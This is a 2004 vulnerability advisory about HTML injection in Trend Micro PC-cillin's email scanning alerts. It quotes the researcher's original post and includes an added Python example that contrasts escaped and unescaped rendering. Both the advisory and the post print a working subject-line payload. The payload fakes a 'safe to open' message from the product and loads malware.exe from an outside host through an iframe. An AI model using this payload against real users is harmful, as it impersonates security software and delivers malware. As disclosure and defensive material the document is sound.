SecurityTracker.com
Category:   Application (Security)  >   Trend Micro Internet Security
Vendors:   Trend Micro
Trend Micro PC-cillin Internet Security Input Validation Flaw Lets Remote Users Spoof Messages
SecurityTracker Alert ID:  1010419
SecurityTracker URL:  http://securitytracker.com/id/1010419
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 8 2004
Impact:   Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 2004
Description:   A vulnerability was reported in Trend Micro's PC-cillin Internet Security. A remote user can send e-mail to spoof messages from the application and potentially cause arbitrary code to be executed.

http-equiv reported that a remote user can send specially crafted HTML in the subject or sender fields to cause a message to be displayed that appears to be a valid message generated by the application.

A demonstration exploit subject field is provided:

Your Safe File<div
style="position:absolute;top:25;left:10;height:300pt;width:300pt;
z-index:+100;font-family:Verdana;font-weight: bold;font-size:
12pt;font-color:green">Trend Micro Internet Security confirms
this file <br>malware.exe is safe to open. Proceed.</div><iframe
src="http://www.malware.com/malware.exe">

A demonstration exploit screenshot is available at:

http://www.malware.com/micronot.png
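
The input validation flaw described above, shown beside its fix. This is an added example, not code from the vendor or from the original report: the alert template, the function names and the sample headers are assumptions constructed for illustration. It renders an alert page from untrusted sender and subject values with and without HTML escaping, then checks which tags in the result did not come from the template.

```python
import html
from html.parser import HTMLParser

# Hypothetical alert template; the product's real template is not shown on the page.
ALERT_TEMPLATE = (
    "<html><body><h1>Alert for incoming mail</h1>"
    "<p>From: {sender}</p><p>Subject: {subject}</p></body></html>"
)
TEMPLATE_TAGS = {"html", "body", "h1", "p"}  # tags the template itself emits


def render_alert_unsafe(sender: str, subject: str) -> str:
    """Flawed pattern: header values are pasted into the alert page as markup."""
    return ALERT_TEMPLATE.format(sender=sender, subject=subject)


def render_alert_safe(sender: str, subject: str) -> str:
    """Hardened pattern: header values are escaped, so they render as text."""
    return ALERT_TEMPLATE.format(
        sender=html.escape(sender, quote=True),
        subject=html.escape(subject, quote=True),
    )


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(alert_html: str) -> list:
    """Return tags in the rendered alert that did not come from the template."""
    collector = _TagCollector()
    collector.feed(alert_html)
    collector.close()
    return [t for t in collector.tags if t not in TEMPLATE_TAGS]


# Constructed sample headers, modelled on the structure of the reported subject.
SENDER = "someone@example.invalid"
SUBJECT = ('Your Safe File<div style="position:absolute;z-index:+100">'
           'This file is safe to open.</div>'
           '<iframe src="http://example.invalid/file">')

if __name__ == "__main__":
    print("unsafe:", injected_tags(render_alert_unsafe(SENDER, SUBJECT)))
    print("safe:  ", injected_tags(render_alert_safe(SENDER, SUBJECT)))
```

The same check can serve as a regression test for any alert or notification page that embeds message headers.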

Impact:   A remote user can spoof messages from the application and potentially cause the target recipient to execute arbitrary code.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.trendmicro.com/
Cause:   Access control error, Input validation error
Underlying OS:   Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Mon, 7 Jun 2004 14:29:45 -0000
Subject:  TREND MICRO: The Protector Becomes The Vector Take II




Monday, June 07, 2004

 
<!-- 

1. When the product alerts it creates an html file in the 
temporary file of the user's machine [the so-called "local zone"]

[screen shot: http://www.malware.com/weallcar.png 29KB ]

This html file is viewed from an Internet Explorer "browser  
object" and
indicates what file is problematic.

-->

Further to the examination of this: 

[see: http://securityfocus.com/archive/1/365050/2004-05-28/2004-06-03/0 ]

It may very well be that alert file while in the temporary 
folder does not in fact run under the so-called "My Computer" 
zone. Previous testing required irritatingly precise manual 
construction of the .zip file with test string therein by the 
counting off the amount of desired html characters to test 
against the name of the file in the .zip and manually modifying 
it accordingly.

While the overall html concept and problem is sound as 
demonstrated, we today find a much easier and default and 
perhaps even worse problem than before.

Incoming Email:

The gadget has a scanning mechanism for incoming email messages 
utilising the exact same alert scheme. In this instance 
everything is set on default and we need not enclose our "bait" 
in a container and fiddle for hours with its name.  We have a 
subject and a sender field. In this case we do like so:

Your Safe File<div 
style="position:absolute;top:25;left:10;height:300pt;width:300pt;
z-index:+100;font-family:Verdana;font-weight: bold;font-size: 
12pt;font-color:green">Trend Micro Internet Security confirms 
this file <br>malware.exe is safe to open. Proceed.</div><iframe 
src="http://www.malware.com/malware.exe">

[screen shot: http://www.malware.com/micronot.png 33KB]

Which should be self-explanatory of only one possibility.

Notes:

1. Using this easier delivery and testing method <object> tag in 
the subject generates an activex warning plus <script>alert()
</script> fails; very strongly suggesting that despite the html 
file being in the local zone, the developers had the foresight 
to have their little Internet Explorer control set at the high 
setting regardless of zoning [might be other reasons including 
these being email vs. web]. Nevertheless:

2. The whole thing is still broken though as frames and images 
render as they should. This completely defeats the security of 
Outlook Express and Outlook which disallow  file downloads, 
external content downloading etc. which this allows on arrival
of the email [not even opening it].

3. Cramming everything into the subject field and modifying 
warning messages as above, all while on default settings can 
prove just as lucrative.

4. There is always a way around the mighty Internet Explorer's 
so-called 'Security Zones' if not today, then tomorrow.

5. This html 'thing' in the alert mechanism really ought to be 
fixed as soon as possible.


End Call


 

-- 
http://www.malware.com




 
 



Copyright 2013, SecurityGlobal.net LLC